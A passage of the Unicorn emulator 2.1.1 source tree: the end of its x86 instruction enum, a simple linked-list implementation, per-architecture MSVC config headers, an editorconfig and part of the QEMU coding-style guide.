UC_X86_INS_VPACKUSWB, UC_X86_INS_VPADDB, UC_X86_INS_VPADDD, UC_X86_INS_VPADDQ, UC_X86_INS_VPADDSB, UC_X86_INS_VPADDSW, UC_X86_INS_VPADDUSB, UC_X86_INS_VPADDUSW, UC_X86_INS_VPADDW, UC_X86_INS_VPALIGNR, UC_X86_INS_VPANDD, UC_X86_INS_VPANDND, UC_X86_INS_VPANDNQ, UC_X86_INS_VPANDN, UC_X86_INS_VPANDQ, UC_X86_INS_VPAND, UC_X86_INS_VPAVGB, UC_X86_INS_VPAVGW, UC_X86_INS_VPBLENDD, UC_X86_INS_VPBLENDMB, UC_X86_INS_VPBLENDMD, UC_X86_INS_VPBLENDMQ, UC_X86_INS_VPBLENDMW, UC_X86_INS_VPBLENDVB, UC_X86_INS_VPBLENDW, UC_X86_INS_VPBROADCASTB, UC_X86_INS_VPBROADCASTD, UC_X86_INS_VPBROADCASTMB2Q, UC_X86_INS_VPBROADCASTMW2D, UC_X86_INS_VPBROADCASTQ, UC_X86_INS_VPBROADCASTW, UC_X86_INS_VPCLMULQDQ, UC_X86_INS_VPCMOV, UC_X86_INS_VPCMPB, UC_X86_INS_VPCMPD, UC_X86_INS_VPCMPEQB, UC_X86_INS_VPCMPEQD, UC_X86_INS_VPCMPEQQ, UC_X86_INS_VPCMPEQW, UC_X86_INS_VPCMPESTRI, UC_X86_INS_VPCMPESTRM, UC_X86_INS_VPCMPGTB, UC_X86_INS_VPCMPGTD, UC_X86_INS_VPCMPGTQ, UC_X86_INS_VPCMPGTW, UC_X86_INS_VPCMPISTRI, UC_X86_INS_VPCMPISTRM, UC_X86_INS_VPCMPQ, UC_X86_INS_VPCMPUB, UC_X86_INS_VPCMPUD, UC_X86_INS_VPCMPUQ, UC_X86_INS_VPCMPUW, UC_X86_INS_VPCMPW, UC_X86_INS_VPCOMB, UC_X86_INS_VPCOMD, 
UC_X86_INS_VPCOMPRESSD, UC_X86_INS_VPCOMPRESSQ, UC_X86_INS_VPCOMQ, UC_X86_INS_VPCOMUB, UC_X86_INS_VPCOMUD, UC_X86_INS_VPCOMUQ, UC_X86_INS_VPCOMUW, UC_X86_INS_VPCOMW, UC_X86_INS_VPCONFLICTD, UC_X86_INS_VPCONFLICTQ, UC_X86_INS_VPERM2F128, UC_X86_INS_VPERM2I128, UC_X86_INS_VPERMD, UC_X86_INS_VPERMI2D, UC_X86_INS_VPERMI2PD, UC_X86_INS_VPERMI2PS, UC_X86_INS_VPERMI2Q, UC_X86_INS_VPERMIL2PD, UC_X86_INS_VPERMIL2PS, UC_X86_INS_VPERMILPD, UC_X86_INS_VPERMILPS, UC_X86_INS_VPERMPD, UC_X86_INS_VPERMPS, UC_X86_INS_VPERMQ, UC_X86_INS_VPERMT2D, UC_X86_INS_VPERMT2PD, UC_X86_INS_VPERMT2PS, UC_X86_INS_VPERMT2Q, UC_X86_INS_VPEXPANDD, UC_X86_INS_VPEXPANDQ, UC_X86_INS_VPEXTRB, UC_X86_INS_VPEXTRD, UC_X86_INS_VPEXTRQ, UC_X86_INS_VPEXTRW, UC_X86_INS_VPGATHERDD, UC_X86_INS_VPGATHERDQ, UC_X86_INS_VPGATHERQD, UC_X86_INS_VPGATHERQQ, UC_X86_INS_VPHADDBD, UC_X86_INS_VPHADDBQ, UC_X86_INS_VPHADDBW, UC_X86_INS_VPHADDDQ, UC_X86_INS_VPHADDD, UC_X86_INS_VPHADDSW, UC_X86_INS_VPHADDUBD, UC_X86_INS_VPHADDUBQ, UC_X86_INS_VPHADDUBW, UC_X86_INS_VPHADDUDQ, UC_X86_INS_VPHADDUWD, UC_X86_INS_VPHADDUWQ, UC_X86_INS_VPHADDWD, UC_X86_INS_VPHADDWQ, UC_X86_INS_VPHADDW, UC_X86_INS_VPHMINPOSUW, UC_X86_INS_VPHSUBBW, UC_X86_INS_VPHSUBDQ, UC_X86_INS_VPHSUBD, UC_X86_INS_VPHSUBSW, UC_X86_INS_VPHSUBWD, UC_X86_INS_VPHSUBW, UC_X86_INS_VPINSRB, UC_X86_INS_VPINSRD, UC_X86_INS_VPINSRQ, UC_X86_INS_VPINSRW, UC_X86_INS_VPLZCNTD, UC_X86_INS_VPLZCNTQ, UC_X86_INS_VPMACSDD, UC_X86_INS_VPMACSDQH, UC_X86_INS_VPMACSDQL, UC_X86_INS_VPMACSSDD, UC_X86_INS_VPMACSSDQH, UC_X86_INS_VPMACSSDQL, UC_X86_INS_VPMACSSWD, UC_X86_INS_VPMACSSWW, UC_X86_INS_VPMACSWD, UC_X86_INS_VPMACSWW, UC_X86_INS_VPMADCSSWD, UC_X86_INS_VPMADCSWD, UC_X86_INS_VPMADDUBSW, UC_X86_INS_VPMADDWD, UC_X86_INS_VPMASKMOVD, UC_X86_INS_VPMASKMOVQ, UC_X86_INS_VPMAXSB, UC_X86_INS_VPMAXSD, UC_X86_INS_VPMAXSQ, UC_X86_INS_VPMAXSW, UC_X86_INS_VPMAXUB, UC_X86_INS_VPMAXUD, UC_X86_INS_VPMAXUQ, UC_X86_INS_VPMAXUW, UC_X86_INS_VPMINSB, UC_X86_INS_VPMINSD, UC_X86_INS_VPMINSQ, UC_X86_INS_VPMINSW, UC_X86_INS_VPMINUB, UC_X86_INS_VPMINUD, UC_X86_INS_VPMINUQ, UC_X86_INS_VPMINUW, UC_X86_INS_VPMOVDB, UC_X86_INS_VPMOVDW, UC_X86_INS_VPMOVM2B, UC_X86_INS_VPMOVM2D, UC_X86_INS_VPMOVM2Q, UC_X86_INS_VPMOVM2W, UC_X86_INS_VPMOVMSKB, UC_X86_INS_VPMOVQB, UC_X86_INS_VPMOVQD, UC_X86_INS_VPMOVQW, UC_X86_INS_VPMOVSDB, UC_X86_INS_VPMOVSDW, UC_X86_INS_VPMOVSQB, UC_X86_INS_VPMOVSQD, UC_X86_INS_VPMOVSQW, UC_X86_INS_VPMOVSXBD, UC_X86_INS_VPMOVSXBQ, UC_X86_INS_VPMOVSXBW, UC_X86_INS_VPMOVSXDQ, UC_X86_INS_VPMOVSXWD, UC_X86_INS_VPMOVSXWQ, UC_X86_INS_VPMOVUSDB, UC_X86_INS_VPMOVUSDW, UC_X86_INS_VPMOVUSQB, UC_X86_INS_VPMOVUSQD, UC_X86_INS_VPMOVUSQW, UC_X86_INS_VPMOVZXBD, UC_X86_INS_VPMOVZXBQ, UC_X86_INS_VPMOVZXBW, UC_X86_INS_VPMOVZXDQ, UC_X86_INS_VPMOVZXWD, UC_X86_INS_VPMOVZXWQ, UC_X86_INS_VPMULDQ, UC_X86_INS_VPMULHRSW, UC_X86_INS_VPMULHUW, UC_X86_INS_VPMULHW, UC_X86_INS_VPMULLD, UC_X86_INS_VPMULLQ, UC_X86_INS_VPMULLW, UC_X86_INS_VPMULUDQ, UC_X86_INS_VPORD, UC_X86_INS_VPORQ, UC_X86_INS_VPOR, UC_X86_INS_VPPERM, UC_X86_INS_VPROTB, UC_X86_INS_VPROTD, UC_X86_INS_VPROTQ, UC_X86_INS_VPROTW, UC_X86_INS_VPSADBW, UC_X86_INS_VPSCATTERDD, UC_X86_INS_VPSCATTERDQ, UC_X86_INS_VPSCATTERQD, UC_X86_INS_VPSCATTERQQ, UC_X86_INS_VPSHAB, UC_X86_INS_VPSHAD, UC_X86_INS_VPSHAQ, UC_X86_INS_VPSHAW, UC_X86_INS_VPSHLB, UC_X86_INS_VPSHLD, UC_X86_INS_VPSHLQ, UC_X86_INS_VPSHLW, UC_X86_INS_VPSHUFB, UC_X86_INS_VPSHUFD, UC_X86_INS_VPSHUFHW, UC_X86_INS_VPSHUFLW, UC_X86_INS_VPSIGNB, UC_X86_INS_VPSIGND, UC_X86_INS_VPSIGNW, UC_X86_INS_VPSLLDQ, UC_X86_INS_VPSLLD, UC_X86_INS_VPSLLQ, 
UC_X86_INS_VPSLLVD, UC_X86_INS_VPSLLVQ, UC_X86_INS_VPSLLW, UC_X86_INS_VPSRAD, UC_X86_INS_VPSRAQ, UC_X86_INS_VPSRAVD, UC_X86_INS_VPSRAVQ, UC_X86_INS_VPSRAW, UC_X86_INS_VPSRLDQ, UC_X86_INS_VPSRLD, UC_X86_INS_VPSRLQ, UC_X86_INS_VPSRLVD, UC_X86_INS_VPSRLVQ, UC_X86_INS_VPSRLW, UC_X86_INS_VPSUBB, UC_X86_INS_VPSUBD, UC_X86_INS_VPSUBQ, UC_X86_INS_VPSUBSB, UC_X86_INS_VPSUBSW, UC_X86_INS_VPSUBUSB, UC_X86_INS_VPSUBUSW, UC_X86_INS_VPSUBW, UC_X86_INS_VPTESTMD, UC_X86_INS_VPTESTMQ, UC_X86_INS_VPTESTNMD, UC_X86_INS_VPTESTNMQ, UC_X86_INS_VPTEST, UC_X86_INS_VPUNPCKHBW, UC_X86_INS_VPUNPCKHDQ, UC_X86_INS_VPUNPCKHQDQ, UC_X86_INS_VPUNPCKHWD, UC_X86_INS_VPUNPCKLBW, UC_X86_INS_VPUNPCKLDQ, UC_X86_INS_VPUNPCKLQDQ, UC_X86_INS_VPUNPCKLWD, UC_X86_INS_VPXORD, UC_X86_INS_VPXORQ, UC_X86_INS_VPXOR, UC_X86_INS_VRCP14PD, UC_X86_INS_VRCP14PS, UC_X86_INS_VRCP14SD, UC_X86_INS_VRCP14SS, UC_X86_INS_VRCP28PD, UC_X86_INS_VRCP28PS, UC_X86_INS_VRCP28SD, UC_X86_INS_VRCP28SS, UC_X86_INS_VRCPPS, UC_X86_INS_VRCPSS, UC_X86_INS_VRNDSCALEPD, UC_X86_INS_VRNDSCALEPS, UC_X86_INS_VRNDSCALESD, UC_X86_INS_VRNDSCALESS, UC_X86_INS_VROUNDPD, UC_X86_INS_VROUNDPS, UC_X86_INS_VROUNDSD, UC_X86_INS_VROUNDSS, UC_X86_INS_VRSQRT14PD, UC_X86_INS_VRSQRT14PS, UC_X86_INS_VRSQRT14SD, UC_X86_INS_VRSQRT14SS, UC_X86_INS_VRSQRT28PD, UC_X86_INS_VRSQRT28PS, UC_X86_INS_VRSQRT28SD, UC_X86_INS_VRSQRT28SS, UC_X86_INS_VRSQRTPS, UC_X86_INS_VRSQRTSS, UC_X86_INS_VSCATTERDPD, UC_X86_INS_VSCATTERDPS, UC_X86_INS_VSCATTERPF0DPD, UC_X86_INS_VSCATTERPF0DPS, UC_X86_INS_VSCATTERPF0QPD, UC_X86_INS_VSCATTERPF0QPS, UC_X86_INS_VSCATTERPF1DPD, UC_X86_INS_VSCATTERPF1DPS, UC_X86_INS_VSCATTERPF1QPD, UC_X86_INS_VSCATTERPF1QPS, UC_X86_INS_VSCATTERQPD, UC_X86_INS_VSCATTERQPS, UC_X86_INS_VSHUFPD, UC_X86_INS_VSHUFPS, UC_X86_INS_VSQRTPD, UC_X86_INS_VSQRTPS, UC_X86_INS_VSQRTSD, UC_X86_INS_VSQRTSS, UC_X86_INS_VSTMXCSR, UC_X86_INS_VSUBPD, UC_X86_INS_VSUBPS, UC_X86_INS_VSUBSD, UC_X86_INS_VSUBSS, UC_X86_INS_VTESTPD, UC_X86_INS_VTESTPS, UC_X86_INS_VUNPCKHPD, UC_X86_INS_VUNPCKHPS, UC_X86_INS_VUNPCKLPD, UC_X86_INS_VUNPCKLPS, UC_X86_INS_VZEROALL, UC_X86_INS_VZEROUPPER, UC_X86_INS_WAIT, UC_X86_INS_WBINVD, UC_X86_INS_WRFSBASE, UC_X86_INS_WRGSBASE, UC_X86_INS_WRMSR, UC_X86_INS_XABORT, UC_X86_INS_XACQUIRE, UC_X86_INS_XBEGIN, UC_X86_INS_XCHG, UC_X86_INS_XCRYPTCBC, UC_X86_INS_XCRYPTCFB, UC_X86_INS_XCRYPTCTR, UC_X86_INS_XCRYPTECB, UC_X86_INS_XCRYPTOFB, UC_X86_INS_XEND, UC_X86_INS_XGETBV, UC_X86_INS_XLATB, UC_X86_INS_XRELEASE, UC_X86_INS_XRSTOR, UC_X86_INS_XRSTOR64, UC_X86_INS_XRSTORS, UC_X86_INS_XRSTORS64, UC_X86_INS_XSAVE, UC_X86_INS_XSAVE64, UC_X86_INS_XSAVEC, UC_X86_INS_XSAVEC64, UC_X86_INS_XSAVEOPT, UC_X86_INS_XSAVEOPT64, UC_X86_INS_XSAVES, UC_X86_INS_XSAVES64, UC_X86_INS_XSETBV, UC_X86_INS_XSHA1, UC_X86_INS_XSHA256, UC_X86_INS_XSTORE, UC_X86_INS_XTEST, UC_X86_INS_FDISI8087_NOP, UC_X86_INS_FENI8087_NOP, UC_X86_INS_ENDING, // mark the end of the list of insn } uc_x86_insn; #ifdef __cplusplus } #endif #endif 
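/*
 Usage sketch (illustrative only, not part of this header): manipulating a
 model-specific register through the pseudo-register UC_X86_REG_MSR, as the
 uc_x86_msr comment above describes. The MSR id 0xC0000100 (FS base on
 x86-64) and the value are hypothetical examples; assumes a valid x86 engine
 handle and the uc_reg_write()/uc_reg_read() declarations from
 unicorn/unicorn.h.
*/
#if 0
static void example_msr(uc_engine *uc)
{
    uc_x86_msr msr = {0xC0000100, 0x12345000};

    uc_reg_write(uc, UC_X86_REG_MSR, &msr); /* write msr.value to MSR msr.rid */
    msr.value = 0;
    uc_reg_read(uc, UC_X86_REG_MSR, &msr);  /* read it back into msr.value */
}
#endif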
unicorn-2.1.1/list.c

#include <stdlib.h>
#include "unicorn/platform.h"
#include "list.h"

// simple linked list implementation

struct list *list_new(void)
{
    return calloc(1, sizeof(struct list));
}

// removes the linked list nodes; node data is only freed via
// list->delete_fn, if one is set
void list_clear(struct list *list)
{
    struct list_item *next, *cur = list->head;
    while (cur != NULL) {
        next = cur->next;
        if (list->delete_fn) {
            list->delete_fn(cur->data);
        }
        free(cur);
        cur = next;
    }
    list->head = NULL;
    list->tail = NULL;
}

// insert a new item at the beginning of the list.
// returns the generated linked list node, or NULL on failure
void *list_insert(struct list *list, void *data)
{
    struct list_item *item = malloc(sizeof(struct list_item));
    if (item == NULL) {
        return NULL;
    }
    item->data = data;
    item->next = list->head;
    if (list->tail == NULL) {
        list->tail = item;
    }
    list->head = item;
    return item;
}

// append a new item at the end of the list.
// returns the generated linked list node, or NULL on failure
void *list_append(struct list *list, void *data)
{
    struct list_item *item = malloc(sizeof(struct list_item));
    if (item == NULL) {
        return NULL;
    }
    item->next = NULL;
    item->data = data;
    if (list->head == NULL) {
        list->head = item;
    } else {
        list->tail->next = item;
    }
    list->tail = item;
    return item;
}

// returns true if the entry was removed, false otherwise
bool list_remove(struct list *list, void *data)
{
    struct list_item *next, *cur, *prev = NULL;
    // is the list empty?
    if (list->head == NULL) {
        return false;
    }
    cur = list->head;
    while (cur != NULL) {
        next = cur->next;
        if (cur->data == data) {
            if (cur == list->head) {
                list->head = next;
            } else {
                prev->next = next;
            }
            if (cur == list->tail) {
                list->tail = prev;
            }
            if (list->delete_fn) {
                list->delete_fn(cur->data);
            }
            free(cur);
            return true;
        }
        prev = cur;
        cur = next;
    }
    return false;
}
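/*
 Usage sketch (illustrative only, not part of this file): a typical lifecycle
 of this list. Assumes the declarations from list.h; list_exists() is defined
 just below. Freeing the list struct itself with free() matches the calloc()
 in list_new().
*/
#if 0
static void example_list_usage(void)
{
    struct list *l = list_new();
    int a = 1, b = 2;

    list_append(l, &a); /* &a becomes the tail */
    list_insert(l, &b); /* &b becomes the new head */
    if (list_exists(l, &a)) {
        list_remove(l, &a); /* unlinks the node holding &a */
    }
    list_clear(l); /* drops the remaining nodes */
    free(l);
}
#endif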
// returns true if the data exists in the list
bool list_exists(struct list *list, void *data)
{
    struct list_item *next, *cur = NULL;
    // is the list empty?
    if (list->head == NULL) {
        return false;
    }
    cur = list->head;
    while (cur != NULL) {
        next = cur->next;
        if (cur->data == data) {
            return true;
        }
        cur = next;
    }
    return false;
}

unicorn-2.1.1/msvc/aarch64-softmmu/config-target.h

/* Automatically generated by create_config - do not modify */
#define TARGET_AARCH64 1
#define TARGET_NAME "aarch64"
#define TARGET_ARM 1
#define CONFIG_SOFTMMU 1
unicorn-2.1.1/msvc/aarch64eb-softmmu/config-target.h

/* Automatically generated by create_config - do not modify */
#define TARGET_AARCH64 1
#define TARGET_NAME "aarch64eb"
#define TARGET_ARM 1
#define TARGET_WORDS_BIGENDIAN 1
#define CONFIG_SOFTMMU 1

unicorn-2.1.1/msvc/arm-softmmu/config-target.h

/* Automatically generated by create_config - do not modify */
#define TARGET_ARM 1
#define TARGET_NAME "arm"
#define TARGET_ARM 1
#define CONFIG_SOFTMMU 1
unicorn-2.1.1/msvc/armeb-softmmu/config-target.h

/* Automatically generated by create_config - do not modify */
#define TARGET_ARM 1
#define TARGET_NAME "armeb"
#define TARGET_ARM 1
#define TARGET_WORDS_BIGENDIAN 1
#define CONFIG_SOFTMMU 1

unicorn-2.1.1/msvc/config-host.h

/* Automatically generated by create_config - do not modify */
#define HOST_I386 1
#define CONFIG_WIN32 1
#define CONFIG_TCG 1
#define CONFIG_CPUID_H 1
// #define CONFIG_INT128 1
#define CONFIG_CMPXCHG128 1
// #define CONFIG_ATOMIC64 1
#define CONFIG_PLUGIN 1
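/*
 Illustrative sketch (not part of the generated headers): code elsewhere in
 the tree can gate on these macros at compile time, for example on guest byte
 order. The helper below is hypothetical; big-endian targets such as armeb
 define TARGET_WORDS_BIGENDIAN in their config-target.h.
*/
#if 0
#include <stdint.h>

static uint32_t load_guest_u32(const uint8_t *p)
{
#ifdef TARGET_WORDS_BIGENDIAN
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
#else
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
#endif
}
#endif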
unicorn-2.1.1/msvc/m68k-softmmu/config-target.h

/* Automatically generated by create_config - do not modify */
#define TARGET_M68K 1
#define TARGET_NAME "m68k"
#define TARGET_M68K 1
#define TARGET_WORDS_BIGENDIAN 1
#define CONFIG_SOFTMMU 1

unicorn-2.1.1/msvc/mips-softmmu/config-target.h

/* Automatically generated by create_config - do not modify */
#define TARGET_ABI_MIPSO32 1
#define TARGET_MIPS 1
#define TARGET_NAME "mips"
#define TARGET_MIPS 1
#define TARGET_WORDS_BIGENDIAN 1
#define CONFIG_SOFTMMU 1
unicorn-2.1.1/msvc/mips64-softmmu/config-target.h

/* Automatically generated by create_config - do not modify */
#define TARGET_ABI_MIPSN64 1
#define TARGET_MIPS64 1
#define TARGET_NAME "mips64"
#define TARGET_MIPS 1
#define TARGET_WORDS_BIGENDIAN 1
#define CONFIG_SOFTMMU 1

unicorn-2.1.1/msvc/mips64el-softmmu/config-target.h

/* Automatically generated by create_config - do not modify */
#define TARGET_ABI_MIPSN64 1
#define TARGET_MIPS64 1
#define TARGET_NAME "mips64el"
#define TARGET_MIPS 1
#define CONFIG_SOFTMMU 1
unicorn-2.1.1/msvc/mipsel-softmmu/config-target.h

/* Automatically generated by create_config - do not modify */
#define TARGET_ABI_MIPSO32 1
#define TARGET_MIPS 1
#define TARGET_NAME "mipsel"
#define TARGET_MIPS 1
#define CONFIG_SOFTMMU 1

unicorn-2.1.1/msvc/ppc-softmmu/config-target.h

/* Automatically generated by create_config - do not modify */
#define TARGET_PPC 1
#define TARGET_NAME "ppc"
#define TARGET_PPC 1
#define TARGET_WORDS_BIGENDIAN 1
#define CONFIG_SOFTMMU 1
unicorn-2.1.1/msvc/ppc64-softmmu/config-target.h:

/* Automatically generated by create_config - do not modify */
#define TARGET_PPC64 1
#define TARGET_NAME "ppc64"
#define TARGET_PPC 1
#define TARGET_WORDS_BIGENDIAN 1
#define CONFIG_SOFTMMU 1

unicorn-2.1.1/msvc/riscv32-softmmu/config-target.h:

/* Automatically generated by create_config - do not modify */
#define TARGET_RISCV32 1
#define TARGET_NAME "riscv32"
#define TARGET_RISCV 1
#define CONFIG_SOFTMMU 1
#define TARGET_SUPPORTS_MTTCG 1
unicorn-2.1.1/msvc/riscv64-softmmu/config-target.h:

/* Automatically generated by create_config - do not modify */
#define TARGET_RISCV64 1
#define TARGET_NAME "riscv64"
#define TARGET_RISCV 1
#define CONFIG_SOFTMMU 1
#define TARGET_SUPPORTS_MTTCG 1

unicorn-2.1.1/msvc/s390x-softmmu/config-target.h:

/* Automatically generated by create_config - do not modify */
#define TARGET_S390X 1
#define TARGET_NAME "s390x"
#define TARGET_S390X 1
#define TARGET_SYSTBL_ABI common,64
#define TARGET_WORDS_BIGENDIAN 1
#define CONFIG_SOFTMMU 1
#define TARGET_SUPPORTS_MTTCG 1
unicorn-2.1.1/msvc/sparc-softmmu/config-target.h:

/* Automatically generated by create_config - do not modify */
#define TARGET_SPARC 1
#define TARGET_NAME "sparc"
#define TARGET_SPARC 1
#define TARGET_WORDS_BIGENDIAN 1
#define CONFIG_SOFTMMU 1

unicorn-2.1.1/msvc/sparc64-softmmu/config-target.h:

/* Automatically generated by create_config - do not modify */
#define TARGET_SPARC64 1
#define TARGET_NAME "sparc64"
#define TARGET_SPARC 1
#define TARGET_WORDS_BIGENDIAN 1
#define CONFIG_SOFTMMU 1
unicorn-2.1.1/msvc/tricore-softmmu/config-target.h:

/* Automatically generated by create_config - do not modify */
#define TARGET_TRICORE 1
#define TARGET_NAME "tricore"
#define TARGET_TRICORE 1
#define CONFIG_SOFTMMU 1

unicorn-2.1.1/msvc/unicorn/dllmain.cpp:

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD ul_reason_for_call,
                      LPVOID lpReserved)
{
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
unicorn-2.1.1/msvc/x86_64-softmmu/config-target.h:

/* Automatically generated by create_config - do not modify */
#define TARGET_X86_64 1
#define TARGET_NAME "x86_64"
#define TARGET_I386 1
#define CONFIG_SOFTMMU 1

unicorn-2.1.1/qemu/.editorconfig:

# EditorConfig is a file format and collection of text editor plugins
# for maintaining consistent coding styles between different editors
# and IDEs. Most popular editors support this either natively or via
# plugin.
#
# Check https://editorconfig.org for details.
root = true

[*]
end_of_line = lf
insert_final_newline = true
charset = utf-8

[*.mak]
indent_style = tab
indent_size = 8
file_type_emacs = makefile

[Makefile*]
indent_style = tab
indent_size = 8
file_type_emacs = makefile

[*.{c,h}]
indent_style = space
indent_size = 4

[*.sh]
indent_style = space
indent_size = 4

[*.{s,S}]
indent_style = tab
indent_size = 8
file_type_emacs = asm

[*.{vert,frag}]
file_type_emacs = glsl

[*.json]
indent_style = space
file_type_emacs = python

unicorn-2.1.1/qemu/CODING_STYLE.rst:

=================
QEMU Coding Style
=================

.. contents:: Table of Contents

Please use the script checkpatch.pl in the scripts directory to check
patches before submitting.

Formatting and style
********************

Whitespace
==========

Of course, the most important aspect in any coding style is whitespace.
Crusty old coders who have trouble spotting the glasses on their noses
can tell the difference between a tab and eight spaces from a distance
of approximately fifteen parsecs. Many a flamewar has been fought and
lost on this issue.

QEMU indents are four spaces. Tabs are never used, except in Makefiles
where they have been irreversibly coded into the syntax. Spaces of
course are superior to tabs because:

* You have just one way to specify whitespace, not two. Ambiguity breeds
  mistakes.
* The confusion surrounding 'use tabs to indent, spaces to justify' is gone.
* Tab indents push your code to the right, making your screen seriously
  unbalanced.
* Tabs will be rendered incorrectly on editors that are misconfigured not
  to use tab stops of eight positions.
* Tabs are rendered badly in patches, causing off-by-one errors in almost
  every line.
* It is the QEMU coding style.

Do not leave whitespace dangling off the ends of lines.

Multiline Indent
----------------

There are several places where indent is necessary:

* if/else
* while/for
* function definition & call

When breaking up a long line to fit within line width, we need a proper
indent for the following lines.

In case of if/else, while/for, align the secondary lines just after the
opening parenthesis of the first. For example:

.. code-block:: c

    if (a == 1 &&
        b == 2) {

    while (a == 1 &&
           b == 2) {

In case of function, there are several variants:

* 4 spaces indent from the beginning
* align the secondary lines just after the opening parenthesis of the
  first

For example:

.. code-block:: c

    do_something(x, y,
        z);

    do_something(x, y,
                 z);

    do_something(x, do_another(y,
                               z));

Line width
==========

Lines should be 80 characters; try not to make them longer.

Sometimes it is hard to do, especially when dealing with QEMU subsystems
that use long function or symbol names. Even in that case, do not make
lines much longer than 80 characters.
Rationale:

* Some people like to tile their 24" screens with a 6x4 matrix of 80x24
  xterms and use vi in all of them. The best way to punish them is to
  let them keep doing it.
* Code, and especially patches, is much more readable if limited to a
  sane line length. Eighty is traditional.
* The four-space indentation makes the most common excuse ("But look
  at all that white space on the left!") moot.
* It is the QEMU coding style.

Naming
======

Variables are lower_case_with_underscores; easy to type and read.
Structured type names are in CamelCase; harder to type but standing out.
Enum type names and function type names should also be in CamelCase.
Scalar type names are lower_case_with_underscores_ending_with_a_t, like
the POSIX uint64_t and family. Note that this last convention
contradicts POSIX and is therefore likely to be changed.

When wrapping standard library functions, use the prefix ``qemu_`` to
alert readers that they are seeing a wrapped version; otherwise avoid
this prefix.

Block structure
===============

Every indented statement is braced; even if the block contains just one
statement. The opening brace is on the line that contains the control
flow statement that introduces the new block; the closing brace is on
the same line as the else keyword, or on a line by itself if there is no
else keyword. Example:

.. code-block:: c

    if (a == 5) {
        printf("a was 5.\n");
    } else if (a == 6) {
        printf("a was 6.\n");
    } else {
        printf("a was something else entirely.\n");
    }

Note that 'else if' is considered a single statement; otherwise a long
if/else if/else if/.../else sequence would need an indent for every else
statement.

An exception is the opening brace for a function; for reasons of
tradition and clarity it comes on a line by itself:

.. code-block:: c

    void a_function(void)
    {
        do_something();
    }

Rationale: a consistent (except for functions...) bracing style reduces
ambiguity and avoids needless churn when lines are added or removed.
Furthermore, it is the QEMU coding style.

Declarations
============

Mixed declarations (interleaving statements and declarations within
blocks) are generally not allowed; declarations should be at the
beginning of blocks.

Every now and then, an exception is made for declarations inside a
#ifdef or #ifndef block: if the code looks nicer, such declarations can
be placed at the top of the block even if there are statements above.
On the other hand, however, it's often best to move that #ifdef/#ifndef
block to a separate function altogether.
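Putting the naming and declaration rules together, a sketch like the
following would satisfy both (the struct and function names here are
invented for illustration and are not taken from the QEMU tree):

.. code-block:: c

    /* CamelCase for the structured type, lower_case elsewhere */
    typedef struct FrobCounter {
        bool active;
    } FrobCounter;

    /* The return type is unsigned because the value counts something */
    static unsigned int count_active(const FrobCounter *counters, size_t n)
    {
        /* declarations at the beginning of the block, then statements */
        unsigned int active = 0;
        size_t i;

        for (i = 0; i < n; i++) {
            if (counters[i].active) {
                active++;
            }
        }
        return active;
    }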
Conditional statements
======================

When comparing a variable for (in)equality with a constant, list the
constant on the right, as in:

.. code-block:: c

    if (a == 1) { /* Reads like: "If a equals 1" */
        do_something();
    }

Rationale: Yoda conditions (as in 'if (1 == a)') are awkward to read.
Besides, good compilers already warn users when '==' is mis-typed as
'=', even when the constant is on the right.

Comment style
=============

We use traditional C-style /``*`` ``*``/ comments and avoid // comments.

Rationale: The // form is valid in C99, so this is purely a matter of
consistency of style. The checkpatch script will warn you about this.

Multiline comment blocks should have a row of stars on the left, and the
initial /``*`` and terminating ``*``/ both on their own lines:

.. code-block:: c

    /*
     * like
     * this
     */

This is the same format required by the Linux kernel coding style.

(Some of the existing comments in the codebase use the GNU Coding
Standards form which does not have stars on the left, or other
variations; avoid these when writing new comments, but don't worry about
converting to the preferred form unless you're editing that comment
anyway.)

Rationale: Consistency, and ease of visually picking out a multiline
comment from the surrounding code.

Language usage
**************

Preprocessor
============

Variadic macros
---------------

For variadic macros, stick with this C99-like syntax:

.. code-block:: c

    #define DPRINTF(fmt, ...)                                       \
        do { printf("IRQ: " fmt, ## __VA_ARGS__); } while (0)
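One detail worth spelling out about the form above: the ``##`` before
``__VA_ARGS__`` is a GCC/Clang extension that deletes the preceding
comma when the macro is invoked with no variadic arguments, so both of
these hypothetical call sites (the variable name is invented) expand to
valid code:

.. code-block:: c

    DPRINTF("raised\n");            /* no extra args: ## swallows the comma */
    DPRINTF("vector %d\n", vector); /* becomes printf("IRQ: " "vector %d\n", vector) */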
Include directives
------------------

Order include directives as follows:

.. code-block:: c

    #include "qemu/osdep.h"  /* Always first... */
    #include <...>           /* then system headers... */
    #include "..."           /* and finally QEMU headers. */

The "qemu/osdep.h" header contains preprocessor macros that affect the
behavior of core system headers like <stdint.h>. It must be the first
include so that core system headers included by external libraries get
the preprocessor macros that QEMU depends on.

Do not include "qemu/osdep.h" from header files since the .c file will
have already included it.

C types
=======

It should be common sense to use the right type, but we have collected
a few useful guidelines here.

Scalars
-------

If you're using "int" or "long", odds are good that there's a better
type. If a variable is counting something, it should be declared with
an unsigned type.

If it's host memory-size related, size_t should be a good choice (use
ssize_t only if required). Guest RAM memory offsets must use
ram_addr_t, but only for RAM; it may not cover the whole guest address
space.

If it's file-size related, use off_t. If it's file-offset related
(i.e., signed), use off_t. If it's just counting small numbers use
"unsigned int"; on all but oddball embedded systems, you can assume
that that type is at least four bytes wide.

In the event that you require a specific width, use a standard type
like int32_t, uint32_t, uint64_t, etc. The specific types are mandatory
for VMState fields.

Don't use Linux kernel internal types like u32, __u32 or __le32.

Use hwaddr for guest physical addresses except pcibus_t for PCI
addresses. In addition, ram_addr_t is a QEMU internal address space
that maps guest RAM physical addresses into an intermediate address
space that can map to host virtual address spaces. Generally speaking,
the size of guest memory can always fit into ram_addr_t but it would
not be correct to store an actual guest physical address in a
ram_addr_t.

For CPU virtual addresses there are several possible types. vaddr is
the best type to use to hold a CPU virtual address in
target-independent code. It is guaranteed to be large enough to hold a
virtual address for any target, and it does not change size from target
to target. It is always unsigned.

target_ulong is a type the size of a virtual address on the CPU; this
means it may be 32 or 64 bits depending on which target is being built.
It should therefore be used only in target-specific code, and in some
performance-critical built-per-target core code such as the TLB code.
There is also a signed version, target_long.

abi_ulong is for the ``*``-user targets, and represents a type the size
